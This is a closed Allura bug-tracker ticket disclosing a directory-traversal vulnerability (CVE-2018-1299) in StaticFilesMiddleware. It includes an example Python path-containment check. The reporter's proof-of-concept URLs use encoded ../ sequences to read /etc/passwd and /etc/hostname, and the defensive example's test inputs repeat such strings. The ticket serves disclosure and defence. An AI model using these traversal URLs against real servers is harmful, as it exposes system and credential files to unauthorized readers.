#8180 StaticFilesMiddleware allows directory traversal

Milestone: v1.8.0
Status: closed
Labels: security (31)
Component: General
Owner: nobody
Updated: 2018-02-06
Created: 2018-01-29
Private: No

From reporter:

The vulnerability allows unauthenticated attackers to retrieve
arbitrary files from the Allura web server.

PoC URLs:
http://<allura-web-server>/nf/1276635823/static/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
http://<allura-web-server>/nf/1276635823/static/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhostname


The %2F doesn't seem necessary in my testing. The paster, nginx and apache/mod_wsgi servers seem to protect against this, but gunicorn (which we recommend for production) permits the vulnerability.

This has been assigned CVE-2018-1299
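As an added example (not Allura's StaticFilesMiddleware and not the fix shipped in v1.8.0), the check below shows how a static-file resolver can reject the encoded traversal above on its own, without relying on the front-end server (nginx, apache) to normalize the URL before the WSGI app sees it. STATIC_ROOT and the request paths are constructed for illustration.

```python
import os
from urllib.parse import unquote

# Constructed root for the example; the directory need not exist for the
# path arithmetic below (realpath resolves as far as it can).
STATIC_ROOT = "/srv/allura/static"


class TraversalError(ValueError):
    """Raised when a request path would resolve outside the static root."""


def resolve_static(url_path: str, static_root: str = STATIC_ROOT) -> str:
    """Map the path after /static/ to an absolute file path under static_root.

    Literal (../) and percent-encoded (..%2F) traversal are treated alike:
    the path is decoded once, joined to the root, fully resolved, and then
    checked for containment, so a server that passes %2F through unchanged
    (as gunicorn did in this ticket) is no worse than one that normalizes.
    """
    root = os.path.realpath(static_root)
    decoded = unquote(url_path)  # decode exactly once: ..%2F -> ../
    if "\x00" in decoded:
        raise TraversalError("NUL byte in request path")
    # lstrip('/') so an absolute path cannot make os.path.join drop the root.
    candidate = os.path.realpath(os.path.join(root, decoded.lstrip("/")))
    # Containment check on the resolved path (symlinks already followed).
    if candidate != root and not candidate.startswith(root + os.sep):
        raise TraversalError(f"request escapes static root: {url_path!r}")
    return candidate


def is_blocked(url_path: str, static_root: str = STATIC_ROOT) -> bool:
    """True when resolve_static rejects url_path as traversal."""
    try:
        resolve_static(url_path, static_root)
    except TraversalError:
        return True
    return False


if __name__ == "__main__":
    for p in ["css/site.css", "css/../site.css", "../../../../etc/passwd",
              "..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd", "css/../../x"]:
        print(f"{p!r}: {'blocked' if is_blocked(p) else resolve_static(p)}")
```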

Discussion

  • Dave Brondsema - 2018-02-01
    • status: in-progress --> closed
  • Dave Brondsema - 2018-02-05
    • Milestone: unreleased --> v1.8.0
  • Dave Brondsema - 2018-02-06
    • private: Yes --> No